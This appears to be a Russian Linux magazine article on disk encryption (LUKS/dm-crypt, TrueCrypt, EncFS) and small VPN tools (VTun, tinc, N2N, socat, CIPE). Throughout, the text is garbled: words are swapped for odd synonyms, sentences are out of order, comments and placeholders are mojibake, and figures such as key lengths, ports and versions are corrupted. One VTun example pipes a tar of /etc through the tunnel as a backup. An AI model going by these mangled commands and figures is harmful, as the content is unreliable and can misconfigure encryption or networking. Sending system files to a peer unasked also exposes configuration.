стандартная подсистема шифрования дисков Linux-ядра версии 0. Все системы могут пустить в ход непохожие алгоритмы шифрования. Serpent либо — либо Twofish. • LUKS (Linux Unified Key Setup) — трафарет шифроваXÀÊÅÐ 00 /141/ 00 ния дисковых устройств с целью Linux. включительно всю структуру каталогов файловой системы. зашифрованная не без; через LUKS/ dm-crypt. AES-256. Для создания LUKS-совместимых шифрованных дисков предназначена обслуживающая программа перед названием cryptsetup-luks. зашифрованные EncFS. хранящийся сверху USB-брелке или смарт-карте. Такая характерная черта делает EncFS неприменимой интересах хранения серьезных данных. момент создания равным образом модификации файлов. Именно во этой стандартизации заключается основа основ компетентность LUKS/dm-crypt перед всеми остальными решениями.

Удалить кнопка можно. а прозвание — обозначение метки. Новые ключи добавляются в LUKS из через образ действий luksAddKey утилиты cryptsetup: $ sudo cryptsetup luksAddKey /dev/sda5 Команда попросит тебя насадить данный пароль. его не грех отобразить на другое блочное построение не без; через Device Mapper равным образом таким образом получить посещение ко данным (все записываемые нате сии устройства данные будут даваться dm-crypt да не в бровь сверху предметный раздел сейчас в зашифрованном виде): $ sudo cryptsetup luksOpen /dev/sda5 èìÿ Теперь нате разделе не запрещается организовать файловую систему равным образом смонтировать ее: $ sudo mkfs. используя следующую команду: $ sudo cryptsetup luksDelKey /dev/sda5 ID-êëþ÷à Размонтирование да вырубание устройства через Device Mapper происходит в обратном порядке: $ umount /mnt/èìÿ $ cryptsetup luksClose sda5 100 Идентификатор нужного ключа твоя милость найдешь на выводе следующей команды: $ sudo cryptsetup luksDump /dev/sda5 XÀÊÅÐ 00 /141/ 00 . KDE. используемый в целях расшифровки ключа шифрования.img bs=1M count=100 # losetup /dev/loop0 luks. на свою очередь.img # cryptsetup luksFormat /dev/loop0 -c aes-cbcessiv:sha256 -s 056 # cryptsetup luksOpen /dev/loop0 luks # mkfs. Это может оказаться нужным во многопользовательских системах к отделения в одни руки пользователю собственного пароля. После того. Утилита cryptsetup запросит пароль. хватит за глаза наболтать по части одной строке в файлы /etc/crypttab да /etc/fstab: $ sudo -i # echo "èìÿ /dev/sda5 none luks. Шифрование домашнего каталога производится объединение по правилам такой же схеме вместе с тем лишь только исключением.apk4 /dev/mapper/èìÿ -L ìåòêà $ sudo mkdir /mnt/èìÿ $ sudo mount /dev/mapper/èìÿ /mnt/èìÿ Чтобы операционная теория самоё научилась включать равным образом монтировать нужные криптованные устройства кайфовый эпоха загрузки. При создании шифрованной флешки специальные записи во /etc/crypttab да /etc/fstab безграмотный требуются. а по времени корректно отключать их умереть и неграмотный встать период шатдауна. расшифровывающего диск. XFCE). на правах раздел короче инициализирован. Попробуй вообразить что-нибудь действительно сложное. устойчив для Watermark-атакам). зачем под добавлением новой записи во /etc/fstab пристало снести старую запись.cipher=aes-cbcessiv:sha256" >> /etc/crypttab # echo "/dev/mapper/èìÿ /mnt/èìÿ ext4 defaults 0 0" \ >> /etc/fstab Теперь изумительный времена каждой загрузки ОС хорошенького понемножку допытывать лозунг для доступа ко криптованному разделу. если бы спирт короче указан нечисто — загрузка остановится. Единственное. которая.UNIXOID Выбираем алгорифм шифрования равно хеширования TrueCrypt Устанавливаем TrueCrypt LUKS/dm-crypt è îáðàçû ÔÑ LUKS/dm-crypt тотально пригоден да в целях создания образов ФС. а буде баять простым языком — ради доступа ко данным раздела.apk2 /dev/mapper/luks # mkdir /mnt/luks # mount /dev/mapper/luks /luks Инициализируем LUKS-раздел вместе с через cryptsetup: $ sudo cryptsetup luksFormat /dev/sda5 \ -c aes-xts-plain -s 056 Опция "-c" задает порядок шифрования. ссылающуюся возьми /home. ECB. которые можно воспользоваться пользу кого хранения важной информации: # dd if=/dev/urandom of=luks. аюшки? надлежит свершить — при первом монтировании флешки модифицировать власть доступа нате ее корневой каталог: $ sudo chown -R þçåð:þçåð /media/èìÿ $ sudo chmod g+s /media/èìÿ Здесь юзер — сие твое псевдоним во системе. Опция "-s" задает длину ключа шифрования на битах. а по времени двукратно ввести новый. выведет возьми кино иллюминатор не без; просьбой ввести пароль. которую ты указал возле создании файловой системы (опция "-L" утилиты mkfs). Подсистема HAL сама определит присутствие получи и распишись устройстве хранения LUKS-раздела и передаст эту информацию среде рабочего стола (Gnome. Интересная отличительная черта LUKS/dm-crypt заключается во внутренние резервы использования враз нескольких ключей шифрования (а значит. во нашем случае сие AES-XTS (имеет гораздо паче высочайший эшелон защиты объединение сравнению из режимами CBC. да паролей) для одного дискового устройства.

добавляет для любому тому заголовок. использует fuse для того монтирования зашифрованных устройств/образов. так может фигурировать использована да про шифрования аж разделов. но.gz $ tar -xzf truecrypt-6. аюшки? небезвыгодно рядом сокрытии информации (LUKS. отворить существующий том да т. TrueCrypt во первую цепочка предназначена с целью шифрования образов ФС. После нажатия получи и распишись кнопку «Create Volume» твоя милость попадешь на ремесленник создания томов. смонтировать.3a-setup-x86 В процессе установки нельзя не расшифровать равным образом подписаться обеими руками вместе с лицензией и завести нестандартный лозунг во системе (или пропуск рута)./truecrypt-6. когда-никогда была выпущена TrueCrypt 0.truecrypt.gz $ . захламляя систему неуправляемыми пакетным менеджером файлами (которые. Основное окно окна занимает опись смонтированных шифрованных образов/разделов.д. на правах было описано выше. на медаль с первой. вдобавок делает сие так. впрыскивание пароля для доступа. Ext2 не ведь — не то Ext3) равным образом т. версии ПО есть ради Windows. Для этого создай спорадический клавиша от через dd: $ dd if=/dev/urandom of=/ïóòü/ê/ôàéëó bs=512 count=4 А после используй его возле инициализации LUKS-раздела: $ sudo cryptsetup luksFormat -c aes-xts-plain -s 056 \ /dev/sda5 /ïóòü/äî/êëþ÷à Для «открытия» раздела используй следующую команду: $ sudo cryptsetup -d /ïóòü/äî/êëþ÷à luksOpen \ /dev/sda5 èìÿ TRUECRYPT Открытая налаженность шифрования дисков TrueCrypt появилась в целях систем Windows снова во 0004 году. После того. TrueCrypt позволяет видоизменять пароли alias файлы ключей пользу кого тамара кроме разор данных (LUKS требует пересоздания тома). так равным образом для того Linux. Mac OS X да Linux. оттого никаких проблем быть переносе образов в среде системами возникнуть не может (для чтения LUKS-разделов подо Windows кушать программа FreeOTFE.0 от графическим интерфейсом в духе с целью Windows. их косточка ни капельки одинаково.Форматирование образа TrueCrypt LUKS/dm-crypt è îäíîðàçîâûå êëþ÷è LUKS/dm-crypt опять же умеет утилизировать одноразовые ключи. В-четвертых. TrueCrypt умеет основывать скрытые шифрованные тамара внутри XÀÊÅÐ 00 /141/ 00 уже существующих томов. в области которому его быстро найти). сохраненный на USB-брелке тож любом другом носителе информации. Так же. равным образом сейчас помощью бадняк на нее была добавлена подспорье Linux (версия 0. После сего TrueCrypt будет установлен во оглавление /usr. Linux-версия TrueCrypt опирается сверху подсистему dm-crypt. которая стала полноценной на 0008 году. Вовторых. что томишко полноте создан. сколько их невозможно отличить через случайных данных. TrueCrypt создает тамара такими. размонтировать.3a-linux-x86. включительно отбор носителя (файл или раздел). Во-первых. внедрение полного пути до файла тамара либо коллекция устройства. правда. предпочтение алгоритма шифрования равно хеширования ключей.sh).0). что очень небезвыгодно присутствие шифровании swap-разделов: Главное иллюминатор TrueCrypt равным образом единственный собранный образ # swapoff -a # cryptsetup -d /dev/urandom create cryptoswap /dev/sda1 # mkswap /dev/mapper/cryptoswap -L accessisdenied -v1 # echo "cryptoswap /dev/sda1 /dev/urandom swap" >> /etc/crypttab # echo "/dev/mapper/cryptoswap none swap sw 0 0" >> /etc/fstab # swapon -a Вместо пароля твоя милость можешь эксплуатнуть основной файл. в чем дело? для очистки совести нельзя доказать их наличие. вроде тамара (обычный другими словами скрытый). его можно найти из через кнопки «Select File» во нижней части окна программы. а следовать ее поддержку отвечают сторонние разработчики). Все несложно равно понятно. на верхней части располагается стандартное меню.3a-linux-x86. одно изо двух файловой системы (FAT. тем не менее равным образом у нее питаться приманка сильные стороны. В своя рука из лицензионными проблемами (при всей открытости исходного стих авторизация TrueCrypt была признана несвободной ведущими производителями дистрибутивов) TrueCrypt был исключен с многих дистрибутивов.tar. по образу равным образом LUKS. могут являться удалены с помощью команды truecrypt-uninstall. подключить знак доступа. а внизу — основные простейшие положения управления программой: сложить томище (Create Volume). В-третьих.tar. пуск размера тома. TrueCrypt со всей серьезностью кроссплатформенна. После установки запускаем команду truecrypt да видим перед собой графичный интерфейс. Он проведет тебя помощью постоянно шаги создания зашифрованного тома. да томище появится на списке подклю- 101 . почему его придется обкатывать равным образом ставить самостоятельно: $ cd /tmp $ wget http://www.д. Это оставляет близкий оттиск на производительности равно делает TrueCrypt побольше медленной на сравнении с LUKS.org/download/truecrypt6.

а decrypted — употребляться легко во вкусе остановка монтирования интересах нее же: $ cd /tmp $ mkdir crypted decrypted Подключим для каталогам EncFS: $ encfs /tmp/crypted /tmp/decrypted Текстовый политическое устройство работы TrueCrypt ченных томов. общественный порядок expert открывает некоторые внутренние резервы ради оптимизации. В режиме paranoid программа самочки ответит получи домашние вопросы равным образом предложит определить слово для доступа для данным. но оставила под целое метаданные сверху виду. прямо-таки ибо ась? нелегален пользу кого частного использования во некоторых странах. чтобы сего подойдет первый встречный каталог. ежели и лучшую плодотворность EncFS показывает возле установке размера блока равным размеру страницы оперативной памяти. твоя милость сможешь задать алгорифм шифрования (AES тож Blowfish).encfs» равно заканчивающийся номером версии. Более того.UNIXOID Создать зашифрованную со через EncFS файловую систему очень просто.. После окончания работы дозволяется нажать «Dismount All» равным образом иссякнуть изо программы. когда другие системы далеко не могут являться использованы (например. только симпатия далеко не используется по части умолчанию. Перейдем на каталог decrypted равно создадим сколько-нибудь файлов: $ $ $ $ cd decrypted echo qwerty > file1 echo asdfgh > file2 echo zxcvbn > file3 Отключим EncFS равным образом взглянем для результат: $ $ $ $ cd . Также порядок объединение дефолту устанавливает объединение данных ФС равным 0024 байт. ЧТО ЛУЧШЕ? Ситуация из шифрующими системами во Linux до боли неоднозначна. поэтому у TrueCrypt очищать вновь единовластно разряд интерфейса: диалоговый текстовый режим. длину ключа. Первый вопрос: выбор режима работы EncFS из пользователем. Кроме того. EncFS совершенно скрыла имена да показатели файлов. OpenSSL равно незначительный библиотеки с целью логирования. протяжение ключа). хоть чтобы большинства пользователей режим paranoid достаточно сильнее правильным выбором. кто не возбраняется включить из через следующей команды: $ truecrypt -t /ïóòü/äî/îáðàçà /òî÷êà/ìîíòèðîâàíèÿ Теперь никуда не денешься огрызнуться получи и распишись ряд вопросов. Выбрав коренной вариант. fusermount -u /tmp/decrypted cd crypted ls для размонтирования используется кумач "-d": $ truecrypt -d Замечу. зачем сие такое. В качестве алгоритмов шифрования могут бытийствовать использованы алгоритмы AES. Twofish да Serpent. ни единолично изо них до сего поры безграмотный был скомпрометирован. Файл охватывает на себя метаданные. В последней версии программы используется весь оный но распорядок шифрования XTS. шифрованный бэкап). По окончании склифосовский создан икона (или TrueCrypt"ный томище в глубине раздела). Ты просто-напросто запускаешь команду «truecrypt -t -c» равно отвечаешь на все те но стандартные вопросы. тот или иной наш брат использовали присутствие создании зашифрованных разделов от через LUKS. когда ничего не поделаешь основать кроссплатформенный том. начинающийся не без; «. что такое? TrueCrypt ничуть неграмотный уступает LUKS в соответствии с степени обеспечения безопасности зашифрованных данных. Не произвольный абонент хорэ радоваться графическому интерфейсу. на этом месте кушать стандартная действие подина названием LUKS/dm-crypt. у LUKS/dm-crypt есть серьезные конкуренты. такие вещи. Создание тамара во этом режиме ужас очень может быть возьми произведение тамара не без; использованием графического мастера. алгоритм Blowfish быстрее AES. С одной стороны.д. TrueCrypt позволяет проэксплуатировать где-то называемые каскады алгоритмов. Для инсталляции EncFS стоит установить пакет не без; одноименным названием: $ sudo apt-get install encfs 102 Как видишь. То есть 0096 байт интересах x86. Например. которые уделывают ее в области нескольким характеристикам. активируемый вместе с через флага "-t". libfuse. можешь жать <Enter> для того выбора ответа по части умолчанию) равно т. кроме поддержки фреймворка fuse на ядре. Так что-то взаимооднозначный избрание изготовить трудно. такие во вкусе опции шифрования (алгоритм. z XÀÊÅÐ 00 /141/ 00 . Но вернемся для нашему зашифрованному каталогу. Стоит сказать. обладающая всеми присущими криптосистеме функциями/свойствами да поддерживаемая с коробки самыми популярными дистрибутивами. Я бы рекомендовал пустить в ход LUKS/dm-crypt тож loop-aes для повседневного использования да пользоваться ко помощи TrueCrypt. ENCFS Виртуальная файловая режим EncFS распространяется на виде обычного дистрибутивного пакета да малограмотный требует к своей работы ничего. Клик нате томе машинально откроет стандартный файловый менеджер. В качестве примера создадим два пустых подкаталога во /tmp: правительство crypted хорэ содержать данные позже их шифрования из через EncFS. что. заголовки MAC (Message authentication code) равно размер блоков шифрования. С новый стороны. равно EncFS. во вкусе Initialization Vector (если твоя милость отнюдь не знаешь. Их итого два: expert (буква «x») равным образом paranoid (буква «p»). от случая к случаю зашифрованный одним алгоритмом группировка данных повторно шифруется другим. EncFS создала небольшой невидимый файл.

Настройки в недрах разбиты возьми изрядно разделов. syslog daemon. Можно включить несколько демонов. Пример для того Debian/Ubuntu: $ sudo apt-cache search vtun vtun . отдельный с которых полноте считывать свой конфиг да сидеть во качестве сервера или клиента. Нужные устройства. Предусмотрена сжатие потока при помощи библиотек zlib равно lzo.conf options { port 0000. Собственно. Ethernet. тогда далеко не плюнь и разотри сделать смешанный частью опции CONFIG_TUN и CONFIG_ETHERTAP. Потоки кодируются 028-битным ключом до алгоритму BlowFish.net) обнажает перворазрядный недосмотр VTun: он не развивается вишь сделано три лета (последнее обновление датировано 0 декабря 0007 года). равным образом настоящее VTun доступен в репозиториях большинства *nix систем: Linux. позволяющие программам в окружении пользователя (userspace) беспричинно выделывать пакеты.1 root root 00. главным требованием выдвинем простоту во настройках равно нетребовательность к ресурсам. Секции options равно default являются общими для всех. SLIP. требующий предварительной правки. ась? тоннель невыгодный бросьте постоянным. для этого подобает всего только проэксплуатировать во качестве транспорта TCP. На одном из хостов план запускается что сервер (слушает 0000 порт). VTUN Очень популярная программа. Но толерантность ко системным ресурсам.UNIXOID Сергей «grinder» Яремчук В поставке поуже соглашаться сделанный шаблон файла. sf. Система работает помощью универсальные драйверы tun равно tap. еще созданы на системе: $ ls -al /dev/net/tun crw-rw-rw.virtual tunnel over TCP/IP networks VTun поддерживает серия типов виртуальных туннелей — IP.in. посему можно выбрать приемлемый разночтение в среде нагрузкой на CPU да загрузкой канала. Знакомство от сайтом проекта (vtun. который гама рассчитана только держи LAN. Устанавливаем донесение vtun на Debian/Ubuntu: $ sudo apt-get install vtun Все настройки демона производятся на файле /etc/vtund. что такое? предлагает нам OpenSource. Все возможные объем не грех откопать на документации VTun. VTun позволяет ему безо проблем законнекчиваться для серверу. а твоя милость далеко не можешь поучаствовать на баталиях за того. В качестве транспортного протокола может использоваться держи одно с двух TCP или — или UDP. воеже правильно распределить загрузку канала. простота равно приспособляемость настроек привели ко тому. Учитывая. позволяющая быстро сложить возможный дюкер через TCP/IP сети. VTun использует клиент-серверную архитектуру. При этом настройки VTun позволяют около необходимости лимитировать натиск туннелей. как правило. Уровень сжатия XÀÊÅÐ 00 /141/ 00 также поддается регулировке. 000 001007-10 02:39 /dev/net/tun Если сердечник пересобиралось самостоятельно. PPP. TTY и pipe. *BSD да Solaris. в целях что используются библиотеки OpenSSL. буква редкость и привлекает пользователей. Если давальщик находится после NAT. после их дозволительно переопределить для каждого клиента: $ sudo nano /etc/vtund. Количество клиентов ограничивается только мощностью сервера. # îïèñûâàåì ïóòè ê èñïîëüçóåìûì ïðî- 103 . а возьми остальных — равно как клиент. количество продукции один — расширить VPN. Посмотрим. либо админы намудрили не без; ограничениями. что его безграмотный списали со счетов.conf.ua Ñàìûé ìàëåíüêèé VPN Âûáèðàåì ïðîñòîå è ëåãêîâåñíîå VPN-ðåøåíèå Если во соседней локалке кайфовый всю шпилятся во одну с популярных сетевых игр.

timeout 00.1. с намерением init-файл знал. да IP-адреса (имени) сервера: XÀÊÅÐ 00 /141/ 00 . идеже отобразить настройки. } default { compress lzo:9. Например. позволяющих учреждать самодействующий бэкап важных данных. }.1 pointopoint 00. При настройке сервера стоит изменить внутри одну строку: Конфигурационный обложка VTun HTTP://WWW links • Сайт проекта VTun — vtun.ru Для основные положения запустим vtund от указанием имени клиентского хоста. ifconfig "%% down".2 -j MASQUERADE". до сути.sf. up { ifconfig "%% 00. route /sbin/route.1. type tun. кроме настроек интерфейса.4/16 gw 00. ip /sbin/ip. âûïîëíÿåìàÿ ïðè ïîäêëþ÷åíèè up { ifconfig "%% 00. кого запускать.2. # óðîâåíü ñæàòèÿ speed 0. 104 $ sudo nano /etc/default/vtun # äëÿ ñåðâåðà RUN_SERVER=yes Теперь позволяется совать сервер: $ sudo invoke-rc.0.dest-unreach. encrypt yes.1. proto udp. $ sudo nano /etc/default/vtun CLIENT0_NAME=client1 # IP èëè èìÿ VTun ñåðâåðà CLIENT0_HOST=vtun. }.conf options { port 0000.net • Сайт проекта tinc — tinc-vpn. # êîìàíäà. } client1 { passwd полегче ввести: $ sudo vtund -s Клиент настраивается аналогично. # òèï ìîæåò áûòü: tun. # êîìàíäà ïðè îòêëþ÷åíèè (íåîáÿçàòåëüíàÿ) down { firewall "-t nat -F". route "add -net 0. которые должны фигурировать выполнены во процессе разрыва VPN. поправь / etc/default/vtun.1.0.0.0. firewall /sbin/iptables. фигурирующего на конфиге. tty. поэтому.1. зеркальны серверным: $ sudo nano /etc/vtund.de/bigred/ devel/cipe.UNIXOID Ищем нужные пакеты во репозитории Ubuntu В Debian/Ubuntu с целью комфорт управления предлагается файл /etc/default/vtun. так: program /bin/sh "-c "tar cf .0.2 pointopoint 00. # speed 056:128. firewall /sbin/iptables. }. # îãðàíè÷åíèå ïîëîñû } # òåïåðü îïèñûâàåì êëèåíòîâ client1 { passwd route /sbin/route. Команды могут присутствовать любые.org/n2n • Страничка socat — www.mydomain. keepalive yes. параметры./etc/*"". ether.inka.2 mtu 0450 # ïðè íåîáõîäèìîñòè ïðîáðàñûâàåì ñîåäèíåíèå # firewall "-t nat -A POSTROUTING -s 00.d vtun start Или для первых порах. дай тебе нажить вяще информации.1. } Аналогично секции up позволено образовать секцию down. pipe type tun.org • Страница проекта n2n — ntop.html ãðàììàì ifconfig /sbin/ifconfig.1". ifconfig /sbin/ifconfig. семо дозволительно где раки зимуют пару строк.0.3.1 mtu 0450". org/socat/ • Проект CIPE — sites. } И даже если твоя милость используешь Debian-based дистрибутив.

участвующие во подключении. iPod.tinc (tinc-vpn. *BSD. Так же. во нашем примере ты да я должны создать два файла: my_vpn равно vpn01. по образу iPhone. добавим семо нашу будущую сеть: $ sudo nano /etc/tinc/net.boot прописываются названия сетей. хватит разработать до сей времени один конфигурационный файл. указав нужное авторитет на параметре Port. Конфиг на наличии на срок только лишь один. Solaris. на нашем случае сие /etc/tinc/ vpnnet.conf # ñèìâîëè÷åñêîå èìÿ ïîäêëþ÷åíèÿ Name=my_vpn # êîìïüþòåð. хотя уделывать ему в тот же миг нечего.2.mydomain. $ sudo nano /etc/tinc/vpnnet/hosts/vpn01 Address=vpn01.org). Данные что до конкретных узлах сети прописываются во подкаталоге hosts. Режим VPN и прогнанный узел.ru Следим после процессом подключения.d vtun start TINC Следующий абитуриент получай имя самого маленького равно самого простого в настройках VPN .1. В файле /etc/tinc/net. которые должны взяться запущены tinc. Также tinc предоставляет шанс связать сообща до некоторой степени Ethernet сегментов. tinc требует наличия драйверов TUN/TAP. благодаря тому на примере оставлю только адрес. áóäóò îòáðîøåíû # DirectOnly=yes # ïåðåíàïðàâëåíèå ïàêåòîâ # Forwarding=<off|internal|kernel> На самом деле постоянно объем безвыгодный нужны. Кроме того. на противоположный рента смотрим логи: необязательно (все настройка позднее размещаем на корне /etc/tinc). как в этом месте дух достаточно разыскивать настройки бредень vpnnet.conf Генерируем ключевую пару для того работы tinc $ sudo vtund -ð client1 vtun.3. Кроме того. Чтобы совмещать возможность подключаться разом для нескольким VPN-сетям. Он пуст (комментарии никак не во счет). должен организовать конфигурационные файлы. доступные лишь только в локальной сети. $ sudo nano /etc/tinc/vpnnet/hosts/my_vpn # IP àäðåñ èëè èìÿ óçëà Address=1. На этом настройку Vtun позволительно вычислять законченной. в надежде потом не путаться.priv # åñëè íåñêîëüêî ñåòåâûõ êàðò BindToInterface=eth1 # ïàêåòû.mydomain. Генерируем ключ: $ sudo tincd -n vpnnet -K 105 . исполнять на игры. а отпустило утилизировать одно имя. активные разработки ведутся по этих пор.Установки на tinc. В дальнейшем клиента дозволено запускать обычным образом вследствие init-скрипт: $ sudo invoke-rc. В награда с VTun. такое разделение за каталогам XÀÊÅÐ 00 /141/ 00 $ sudo nano /etc/tinc/vpnnet/tinc. для которому будем подключаться. описываются на файле tinc. Пакет вместе с tinc доступен на репозиториях большинства дистрибутивов. ê êîòîðîìó ïîäêëþ÷àåìñÿ # âîçìîæíî çàäàíèå íåñêîëüêèõ ConnectTo ConnectTo=vpn01 # óñòðîéñòâî Device=/dev/net/tun # ðåæèì VPN: router|switch|hub Mode=switch PrivateKeyFile=/etc/tinc/vpnnet/rsa_key.boot vpnnet В /usr/share/doc/tinc/examples твоя милость найдешь упражнения конфигов. опытным путем поддерживается производство равно возьми таких девайсах. Windows 0k-Se7en.conf: $ sudo tail -f /var/log/message Команда ifconfig покажет существование tun0 интерфейса. tinc позволяет спаять в кругу внешне компьютеры путем IPv4/IPv6 сети.4 # ëîêàëüíàÿ ñåòü. Для шифрования потока задействуется OpenSSL. сгенерировать пару ключей да расширить их возьми компьютеры. надлежит поместить их настройки на «своих» подкаталогах. в качестве кого да VTun.0/24 # èñïîëüçîâàíèå TCP # TCPOnly=yes Второй обложка по существу аналогичен. êîòîðûå íå ìîãóò ïðîéòè íàïðÿìóþ. например. Установочный пакет для Windows дозволено скачать держи офсайте. В Debian/Ubuntu вводим: $ sudo apt-get install tinc После установки стартует демон. По мере необходимости копируем их во /etc/tinc да правим. когда дьявол занят alias блокируется файером.ru По умолчанию tinc использует пристань 055. Чтобы примолвить новоизобретённый мост. Если VPN-сеть одна. Чтобы все заработало. работающие почти управлением самых разных ОС: Linux. Например. зачем позволяет. Mac OS X. В самых простых случаях стоит откинуть первые число директив.168. ведь его позволительно изменить. èñïîëüçóåòñÿ äëÿ ìàðøðóòèçàöèè Subnet=192. что усадка из через zlib иначе говоря lzo. В пределах одной VPN мережа ее заголовок рекомендательно требуется фигурировать уникальным на всех системах-участниках. на файлах узлов хранится общедоступный треншальтер (заносится автопилотом быть создании). Стартовал цель хватит давно (в 0998 году).

сверху котором трясавица короче получать подключения.UNIXOID Запускаем supernode во отладочном режиме Единственной документацией получай anytun являются man-страницы В процессе работы скрипт спросит. пупок развяжется соблюсти закрытый равно публичный ключи. -r — àêòèâèðîâàòü ôîðâàðäèíã/ðîóòèíã ïàêåòîâ (ýòà ôóíêöèÿ ïîçâîëÿåò ïîäêëþ÷èòüñÿ íå òîëüêî ê Edge Node. позволяющее разработать VPN-соединение посередь двумя равным образом побольше сетями. Опять же. Если самую малость банально безграмотный так. Обмен происходит подле помощи UDP-пакетов. Как видишь. зарегистрируем получи supernode двоечка узла node1 да node2. subnet-up/subnet-down.4:7654 node2$ sudo edge -a 00. поэтому его используют про кратковременных сеансов. отнюдь не весь они обязательны.3.1.3. Supernode никак не совмещает на себя функции Edge Node. быть необходимости давалец запускают отдельно. Никаких конфигов N2N далеко не использует.168. С точки потребления трафика поддерживать сходственный тоннель постоянно открытым достаточно убыточно (все промежуток времени пусть будет так заявление ко supernode).2. Процессом установления отношения управляет особенный агрегат supernode. Windows (доступен GUI) и OpenWRT задействуются TUN/TAP-драйвера. Для организации туннеля во Linux. Конечный компьютер (Edge Node) может синхронно оказываться подключен ко нескольким таким сетям. в некоторых случаях Edge Node невыгодный могут взаимодействовать напрямую. Также на командной строке позволительно указать: -h — èñïîëüçîâàòü HTTP-òóííåëü (ýêñïåðèìåíòàëüíàÿ âîçìîæíîñòü). Так. host-up/subnet-down. команды.2.1. указав в качестве параметра "-l" порт.2. Например. равным образом криптооперация то и дело вообще 106 $ sudo apt-get install n2n $ supernode -l 0654 -v Для подключения для VPN-сети используется распоряжение edge. -f — çàïóñòèòü ïðîöåññ â âèäå äåìîíà. вследствие чего участники после подключения отправляют информацию напрямую. параметров у нее больше. запускаем демона на режиме отладки: $ sudo tincd -n vpnnet -d5 -D N2N Проект N2N (network to network. введенные для разных узлах. Установка на Debian/Ubuntu проста: $ sudo nano /etc/tinc/vpnnet/tinc-up #!/bin/sh modprobe tun ifconfig $INTERFACE 092. На первых порах в целях получения паче подробной информации лучше использовать родничек "-v". пароли указываются в командной строке. ntop. -l — äàííûå supernode. -d — óêàçàòü TAP-óñòðîéñòâî (ïîëåçíî ïðè îäíîâðåìåííîé XÀÊÅÐ 00 /141/ 00 .4:7654 В рента получаем передача «Registering with supernode».10 netmask 055. -k — êëþ÷ äëÿ ïîäêëþ÷åíèÿ ê VPN-ïîäñåòè.255.2. Надо сказать.1 -c mynetwork -k encryptme -l 1. не используют во угоду меньшему потреблению системных ресурсов. в таком случае кушать никаких учетных данных в целях соединения дьявол безграмотный содержит. êîòîðûé äåêëàðèðóåò êëèåíò äëÿ ïîäêëþ÷åíèÿ ê VPN-ñåòè. Все. происходит возведение VPN. N2N особенно полюбился любителям игр. Причем на дело supernode далеко не входит ипостась авторизации.d/tinc start Процесс подключения довольно отображен на логах. отличаются лишь объявляемым IP. некто но используется как промежуточный на тех случаях. Обрати внимание: компетенция суперпользователя не требуются. обеспечивающие поднятие/остановку нужного интерфейса равным образом маршрутизацию возле включении VPN: tinc-up/tinc-down.1. Для обмена данными используется P2P-архитектура.org/n2n) предлагает решение.0 После зачем во системе появятся двушник исполняемых файла — supernode и edge. чтобы которых устойчивость никак не является основным критерием близ выборе VPN. Основными являются: -a — ñâîé IP-àäðåñ. *BSD. -ñ — íàçâàíèå âèðòóàëüíîé ïîäñåòè. клиенты самочки договариваются посредь собою позднее подключения. Также для того каждой силок пристало настроить скрипты. Такой ход упрощает работу в случае недоступности одного с supernode — несложно выбираем видоизмененный и подключаемся чрез него.2 -c mynetwork -k encryptme -l 1. дозволено запускать: $ sudo /etc/init. Если пароли совпадают. команда ifconfig покажет наличествование интерфейса edge0 из указанными сверх параметрами. распоряжение ifconfig покажет новое соединение. К сожалению. íî è ê óäàëåííîé ñåòè). Запускаем supernode. Вводим на каждом: node1$ sudo edge -a 00.255. в N2N глотать минусы да со точки зрения безопасности. вследствие чего их свободно подглядеть во хистори. Mac OS X.

net). справочная информация на сайте проекта только лишь возьми немецком.6. список и другие.3. Стоит отметить.reuseaddr TUN:192.dest-unreach. Пользователи нормально применяют socat в качестве TCP-прокси к соксификации приложений. OpenSolaris. кабы ему нужна утилита. Mac OS X равно Cygwin. Например.cafile=/etc/vpn/client. однако схема стандартна. нужен внеочередной протокол. вследствие чего CIPE убрали изо репозиториев многих дистрибутивов.cert=/etc/vpn/ server. IDEA). которые помогают души равно минуя лишних телодвижений взвихрить VPN.inka. ответвления (форки) возникают не без; завидной регулярностью: OpenBSD netcat. Написана сверху Java равно трансцендентно может быть запущена бери первый встречный платформе.cafile=/etc/vpn/server. для того которой доступна Java RE. Использование SSL равным образом отнюдь не вызывает сложностей. sites. в духе сие дозволяется сделать. передавать/принимать данные. на Ubuntu пакеты cipe-common и cipe-source были доступны снова во версии 0. нет перевода осуществление P2P VPN.06 (Dapper Drake). ЗАКЛЮЧЕНИЕ Рассмотреть однако предложения во рамках одной статьи невозможно.reuseaddr. IP6. работающего после VPN — при недоступности одного сервера дьявол вынужден законнекчиваться ко другому.0. при необходимости используется сжатие. который будет быть настороже морские ворота 0555: $ sudo socat -d -d TCP-LISTEN:5555. Надеюсь. движение шифруется рядом помощи AES (128 бит). в более новых релизах пользователям CIPE надобно подбирать его самостоятельно. Обмен происходит после виртуальное образование cipcbx.gz — 042 Кб openvpn-2.255. указав во параметре TCP-адрес и морские ворота удаленной системы: $ socat TCP:1.2/24. И даже если симпатия поуже давнёшенько безвыгодный развивается (с января 0004 года). С его через усилий сплотить два узла. IP4. очевидно. Так. Чтобы трудиться при помощи VPN с anycast. а в свой черед их комбинация. raw). так доступен порт сторонних разработчиков чтобы WinNT4.3. Так.pem.3.4:5555 TUN:192. Сейчас рассмотрим. Принцип работы CIPE (Crypto IP Encapsulation.2.gz — 039 Кб tinc-1.CIPE Скриншот с редактора: установка сервера OpenVPN для тенетный зрелище на HMM3 Ñàìûé ìàëåíüêèé VPN anytun-0. необходимо подобрать netcat. описывающий основа соединения unicast равно anycast-сетей. Минус — расчёт почти что прекратил свое кругозор (последнее обновление было во 0002 году). идеже провайдеры блокируют протоколы GRE alias любые нестандартные порты. *BSD.tar. что. Сам соглашение CIPE открыт и документирован. зачем socat поддерживает Linux. Основная ее свойство — случай работы без центрального сервера.html) ужас прост.tar. разработан равно получил термин SATP (Secure Anycast Tunneling Protocol). которая в такой мере да называется — P2PVPN (p2pvpn. среди представленных вариантов твоя милость еще сделал особенно подходящий. который-нибудь найдешь на архиве. чистый пакетик заключает информацию относительно получателе. Данные шифруются динамическими 028-битными ключами (Blowfish. там. Шифрованные близ помощи протокола CIPE (текущая видоизменение CIPEv3) IP-пакеты инкапсулируются на UDP-датаграммы. псевдотерминал.up Подключаемся ко нему вместе с другого компьютера. TCP. доступны безвыездно варианты использования программы.gz — 097 Кб n2n_svn_23072010.tar.gz — 010 Кб vtun-3. для того обхода файера равным образом приближенно далее.cert=/ etc/vpn/client.crt echo Подключаемся клиентом: $ sudo socat stdio openssl-connect:example. СЕМЕЙСТВО NETCAT — SOCAT Любой юниксоид знает.1. Активируем сервер: ðàáîòå ñ íåñêîëüêèìè ñåòÿìè).sf.13. Win2k (cipewin32.1/24. К сожалению. UNIX.crt Осталось добавить.tgz — 035 Кб socat-1.1. что шелл для Unix-сокету.tar. На просторах интернета не 